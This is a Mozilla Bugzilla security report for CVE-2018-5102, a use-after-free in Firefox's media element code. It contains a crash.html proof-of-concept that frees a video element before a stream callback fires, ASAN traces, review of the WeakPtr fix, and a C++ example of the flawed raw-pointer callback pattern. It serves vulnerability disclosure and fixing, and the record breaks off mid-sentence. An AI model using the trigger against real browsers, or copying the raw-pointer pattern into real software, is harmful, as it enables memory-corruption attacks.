Bug 1419363 (CVE-2018-5102)

heap-use-after-free in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable

VERIFIED FIXED in Firefox -esr52

Status


defect
P1
normal
Rank: 5
VERIFIED FIXED
a year ago
8 months ago

People

(Reporter: nils, Assigned: pehrsons)

Tracking

({csectype-uaf, sec-high})

59 Branch
mozilla59
Points: ---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr52 58+ verified, firefox57 wontfix, firefox58+ verified, firefox59+ verified)

Details

(Whiteboard: [adv-main58+][adv-esr52.6+][post-critsmash-triage])

Attachments

(3 attachments)

(Reporter)

Description

a year ago
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=d4753dc14b2ab9c42123b6d60a68106df40f45cd). It requires the fuzzPriv extension.


crash.html:
<script>
// Spin the event loop with a synchronous XHR so pending main-thread work runs first.
function spin () {
    var x = new XMLHttpRequest();
    x.open("POST", "https://mozilla.org", false);
    try { x.send("X"); } catch (e) {}
}
function start() {
    o55 = document.createElementNS('http://www.w3.org/1999/xhtml', 'video');
    o73 = document.createElementNS('http://www.w3.org/1999/xhtml', 'video');
    // Capture o73's stream and make o55 play it: o55 is now waiting on the
    // stream's tracks-available callback.
    o81 = o73.mozCaptureStreamUntilEnded();
    o55.srcObject = o81;
    spin();
    // Drop the script references to o55 and the stream so o55 can be collected.
    o55 = null;
    o81 = null;
    // Start playback on o73 so the captured stream's tracks become available.
    o73.setAttribute('src', 'data:video/webm;base64,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');
    o73.play();
    // Force GC/CC (fuzzPriv extension) so o55 is freed before the callback fires.
    fuzzPriv.GC(); fuzzPriv.CC(); fuzzPriv.GC(); fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==24229==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a00009eb70 at pc 0x7ff2afdc4883 bp 0x7ffea6c8e490 sp 0x7ffea6c8e488
READ of size 8 at 0x61a00009eb70 thread T0 (file:// Content)
    #0 0x7ff2afdc4882 in operator! /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:312:36
    #1 0x7ff2afdc4882 in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable(mozilla::DOMMediaStream*) /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:2258
    #2 0x7ff2affd159f in mozilla::DOMMediaStream::CheckTracksAvailable() /builds/worker/workspace/build/src/dom/media/DOMMediaStream.cpp:1361:19
    #3 0x7ff2affeba42 in applyImpl<mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #4 0x7ff2affeba42 in apply<mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #5 0x7ff2affeba42 in mozilla::detail::RunnableMethodImpl<mozilla::DOMMediaStream*, void (mozilla::DOMMediaStream::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #6 0x7ff2aad2a428 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/TaskDispatcher.h:214:37
    #7 0x7ff2aad2758b in mozilla::EventTargetWrapper::Runner::Run() /builds/worker/workspace/build/src/xpcom/threads/AbstractThread.cpp:150:32
    #8 0x7ff2aad24861 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #9 0x7ff2aad4a196 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #10 0x7ff2aad64b18 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #11 0x7ff2abb3ff41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #12 0x7ff2abaa06bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #13 0x7ff2abaa06bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #14 0x7ff2abaa06bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #15 0x7ff2b15a723f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #16 0x7ff2b58dede7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #17 0x7ff2abaa06bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7ff2abaa06bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7ff2abaa06bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7ff2b58de79a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #21 0x4ebb1e in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #22 0x4ebb1e in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #23 0x7ff2c857c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #24 0x41d408 in _start (/fuzzer3/firefox/firefox+0x41d408)

0x61a00009eb70 is located 240 bytes inside of 1400-byte region [0x61a00009ea80,0x61a00009eff8)
freed by thread T0 (file:// Content) here:
    #0 0x4bb93b in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7ff2aabe3a17 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7ff2aabeb0bb in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7ff2aabeb0bb in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3925
    #4 0x7ff2aabea5d3 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3746:9
    #5 0x7ff2aabee420 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4315:21
    #6 0x7ff2adc7ac0d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1505:3
    #7 0x7ff2ad7b6a5b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1450:3
    #8 0x7ff2aad74ce1 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7ff2ac587df0 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7ff2ac587df0 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7ff2ac587df0 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7ff2ac58eb7f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #14 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #15 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #16 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #17 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #18 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #19 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #20 0x7ff2b65caef3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2967:12
    #21 0x7ff2ac4a739b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #23 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #24 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #25 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #26 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #27 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #28 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #29 0x7ff2b65ccd7b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3026:12
    #30 0x7ff2af10f335 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7ff2afb12d5d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7ff2afb12d5d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7ff2afadade6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1117:51
    #34 0x7ff2afadcfb2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1292:20
    #35 0x7ff2afabe2b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #36 0x7ff2afac1782 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #37 0x7ff2b1e2e1de in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bbc8c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed09d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7ff2afe723a6 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7ff2afe723a6 in NS_NewHTMLVideoElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLVideoElement.cpp:38
    #4 0x7ff2afec7c66 in CreateHTMLElement /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:392:41
    #5 0x7ff2afec7c66 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsTSubstring<char16_t> const*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:363
    #6 0x7ff2adcabdd5 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsTSubstring<char16_t> const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:182:12
    #7 0x7ff2adb775f7 in nsDocument::CreateElementNS(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::dom::ElementCreationOptionsOrString const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6143:8
    #8 0x7ff2af1539f4 in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1305:59
    #9 0x7ff2af6ec630 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #10 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #12 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #13 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #14 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #15 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #16 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #17 0x7ff2b65ccd7b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3026:12
    #18 0x7ff2af10f335 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #19 0x7ff2afb12d5d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #20 0x7ff2afb12d5d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #21 0x7ff2afadade6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1117:51
    #22 0x7ff2afadcfb2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1292:20
    #23 0x7ff2afabe2b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #24 0x7ff2afac1782 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #25 0x7ff2b1e2e1de in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #26 0x7ff2b4ec70f1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7779:21
    #27 0x7ff2b4ec3114 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7577:7
    #28 0x7ff2b4eca9af in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7474:13
    #29 0x7ff2ac99b373 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #30 0x7ff2ac99a4dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #31 0x7ff2ac997568 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #32 0x7ff2ac999482 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #33 0x7ff2ac99a0dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
    #34 0x7ff2aaef4400 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:312:36 in operator!
Shadow bytes around the buggy address:
  0x0c348000bd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c348000bd20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c348000bd30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c348000bd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c348000bd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c348000bd60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd
  0x0c348000bd70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bd80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bd90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bdb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==24229==ABORTING
(Reporter)

Comment 1

a year ago
Posted file ASAN output
Group: core-security → media-core-security
sec-high --> P1
Added various media people
Priority: P2 → P1
Component: Audio/Video → Audio/Video: MediaStreamGraph
NI pehrsons/jya to look deeper
Flags: needinfo?(jyavenard)
Flags: needinfo?(apehrson)
Rank: 5
(Assignee)

Comment 4

a year ago
I'll take this. Suspect so far is bug 879717, the first media bug I ever tackled.
Assignee: nobody → apehrson
Status: NEW → ASSIGNED
Flags: needinfo?(jyavenard)
Flags: needinfo?(apehrson)
(Assignee)

Comment 5

a year ago
This is from bug 879717 indeed. I have a simple patch coming up that should go cleanly on all affected branches.
It depends on HTMLMediaElement supporting WeakPtr. This was added in 50 by bug 1267918 so even 52 is safe.
Blocks: 879717
(Assignee)

Comment 6

a year ago
Attachment #8933289 - Flags: review?(jib)
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

Review of attachment 8933289 [details] [diff] [review]:
-----------------------------------------------------------------

Lgtm, but using a weakPtr means yielding to the fact that some invariant we thought we had, no longer exists (or never existed).

I'm a bit worried we're merely pushing the problem ahead of us, since HTMLMediaElement::MediaStreamTrackListener 20 lines below uses the exact same pattern.

But from irc I understand OnTracksAvailableCallback is unusually nasty because it's fire and forget, and explicit removal doesn't exist, unlike UnregisterTrackListener(), so this seems like the right approach, and might suffice.
Attachment #8933289 - Flags: review?(jib) → review+
Should we maybe log a message or something?
(Assignee)

Comment 9

a year ago
(In reply to Jan-Ivar Bruaroey [:jib] (needinfo? me) from comment #7)
> Comment on attachment 8933289 [details] [diff] [review]
> Switch to WeakPtr
> 
> Review of attachment 8933289 [details] [diff] [review]:
> -----------------------------------------------------------------
> 
> Lgtm, but using a weakPtr means yielding to the fact that some invariant we
> thought we had, no longer exists (or never existed).
> 
> I'm a bit worried we're merely pushing the problem ahead of us, since
> HTMLMediaElement::MediaStreamTrackListener 20 lines below uses the exact
> same pattern.
> 
> But from irc I understand OnTracksAvailableCallback is unusually nasty
> because it's fire and forget, and explicit removal doesn't exist, unlike
> UnregisterTrackListener(), so this seems like the right approach, and might
> suffice.

MediaStreamTrackListener is safe since we guarantee to EndSrcMediaStreamPlayback() before destroying the media element (called from both CC and dtor as fallbacks).


(In reply to Jan-Ivar Bruaroey [:jib] (needinfo? me) from comment #8)
> Should we maybe log a message or something?

Destroying the media element before the MediaStream has tracks available is valid, so I'm not sure it adds that much. One could probably see that the media element is going away and that tracks become available as explicit events in existing logs.
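The lifetime problem discussed in the review above, as an added example that is not part of this bug's patch or of Gecko: a stream keeps a fire-and-forget tracks-available callback that later calls into a media element, and nothing unregisters it if the element dies first. The raw-pointer registration is the pattern from bug 879717; the weak-reference registration is the shape of the fix. The class and method names are simplified stand-ins, and std::weak_ptr stands in for mozilla::WeakPtr.

```cpp
// Added example, not Firefox code. Models the OnTracksAvailableCallback
// lifetime bug and its WeakPtr fix. Names are stand-ins for the Gecko ones;
// std::weak_ptr plays the role of mozilla::WeakPtr.
#include <functional>
#include <memory>
#include <utility>
#include <vector>

struct MediaElement {
  bool tracksNotified = false;
  void NotifyMediaStreamTracksAvailable() { tracksNotified = true; }
};

// Stand-in for DOMMediaStream: callbacks registered here run later, from a
// posted runnable, and there is no API to remove them once registered.
struct MediaStream {
  // Each callback reports whether it reached a live element.
  std::vector<std::function<bool()>> pending;
  int delivered = 0;
  int dropped = 0;

  void OnTracksAvailable(std::function<bool()> cb) {
    pending.push_back(std::move(cb));
  }
  // The deferred CheckTracksAvailable() seen in the ASAN stack.
  void CheckTracksAvailable() {
    auto cbs = std::move(pending);
    pending.clear();
    for (auto& cb : cbs) {
      if (cb()) ++delivered; else ++dropped;
    }
  }
};

// Pattern from bug 879717: the callback captures a raw pointer. If the
// element is freed (by the cycle collector; here by scope exit) before the
// stream's tracks become available, the callback touches freed memory.
void RegisterRaw(MediaStream& stream, MediaElement* element) {
  stream.OnTracksAvailable([element] {
    element->NotifyMediaStreamTracksAvailable();  // UAF if element is dead
    return true;
  });
}

// The fix: hold a weak reference and do nothing if the element is gone.
// Destroying the element before tracks arrive is a valid sequence, so the
// notification is simply dropped.
void RegisterWeak(MediaStream& stream, const std::shared_ptr<MediaElement>& element) {
  std::weak_ptr<MediaElement> weak = element;
  stream.OnTracksAvailable([weak] {
    if (auto strong = weak.lock()) {
      strong->NotifyMediaStreamTracksAvailable();
      return true;
    }
    return false;  // element already destroyed; skipped safely
  });
}

// Same ordering as crash.html: register the element against the stream,
// collect the element, then let the stream's tracks become available.
// Returns {delivered, dropped} for the weak-reference version.
std::pair<int, int> WeakElementDiesFirst() {
  MediaStream stream;
  {
    auto element = std::make_shared<MediaElement>();
    RegisterWeak(stream, element);
  }  // last strong reference dropped: the element is freed here
  stream.CheckTracksAvailable();
  return {stream.delivered, stream.dropped};
}

// Control: the element outlives the callback, so the notification lands.
bool WeakElementAlive() {
  MediaStream stream;
  auto element = std::make_shared<MediaElement>();
  RegisterWeak(stream, element);
  stream.CheckTracksAvailable();
  return element->tracksNotified && stream.delivered == 1;
}

// Raw-pointer control with the element still alive. The element-freed-first
// ordering with RegisterRaw is deliberately not run here: that is the
// undefined behaviour ASAN reported above, and only a sanitizer build makes
// it visible reliably.
bool RawElementAlive() {
  MediaStream stream;
  MediaElement element;
  RegisterRaw(stream, &element);
  stream.CheckTracksAvailable();
  return element.tracksNotified;
}
```

Building the raw-pointer scenario with the element freed first under -fsanitize=address produces the same class of heap-use-after-free report as the one in the description; the weak-reference version turns that ordering into a dropped notification, which is why the patch could be small and branch-clean.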
(Assignee)

Comment 10

a year ago
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
It's fairly obvious that this fixes a UAF, and with some code tracing and API knowledge one could probably work out how to trigger it quite easily too. However triggering involves GC so it's not fully deterministic.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
No, though the patch itself is pretty clear.

Which older supported branches are affected by this flaw?
37 and up, so all supported.

If not all supported branches, which bug introduced the flaw?
bug 879717

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
This patch should go clean on all branches.

How likely is this patch to cause regressions; how much testing does it need?
I don't see any such risk.
Attachment #8933289 - Flags: sec-approval?
sec-approval+ for trunk. Please nominate the patch (assuming it does apply) for Beta and ESR52.
Attachment #8933289 - Flags: sec-approval? → sec-approval+
(Assignee)

Updated

a year ago
Keywords: checkin-needed
(Assignee)

Comment 12

a year ago
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
User impact if declined: js-triggerable (not completely, depends on GC) UAF
Fix Landed on Version: It's about to go into 59
Risk to taking this patch (and alternatives if risky): Very very low.
String or UUID changes made by this patch: None
Attachment #8933289 - Flags: approval-mozilla-esr52?
Attachment #8933289 - Flags: approval-mozilla-beta?
(Assignee)

Comment 13

a year ago
I should mention I tried applying it to beta and esr52 and it went cleanly.
https://hg.mozilla.org/mozilla-central/rev/e0a21cc26e07
Status: ASSIGNED → RESOLVED
Last Resolved: a year ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
Comment on attachment 8933289 [details] [diff] [review]
Switch to WeakPtr

Fix a sec-high. Beta58+ & ESR52+.
Attachment #8933289 - Flags: approval-mozilla-esr52?
Attachment #8933289 - Flags: approval-mozilla-esr52+
Attachment #8933289 - Flags: approval-mozilla-beta?
Attachment #8933289 - Flags: approval-mozilla-beta+
Group: media-core-security → core-security-release
Whiteboard: [adv-main58+][adv-esr52.6+]
Alias: CVE-2018-5102
Flags: qe-verify+
Whiteboard: [adv-main58+][adv-esr52.6+] → [adv-main58+][adv-esr52.6+][post-critsmash-triage]
Flags: sec-bounty?
I managed to reproduce the initial issue using mozilla-central.pushdate.2017.11.21.20171121095304.firefox.linux64-asan-debug build. Also I can confirm that the latest corresponding builds for Nightly (mozilla-central.pushdate.2018.01.22.20180122111948.firefox.linux64-asan-debug) and ESR (mozilla-esr52.pushdate.2018.01.21.20180121200330.firefox.linux64-asan-debug) are verified fixed using Ubuntu 16.04 x64. 
I encountered difficulties for Beta: 
